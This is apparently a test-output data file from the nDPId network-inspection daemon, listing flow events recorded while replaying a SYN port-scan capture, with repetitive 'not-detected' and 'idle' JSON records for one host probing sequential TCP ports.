+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1039,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1039,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1044,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1044,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1049,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1049,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 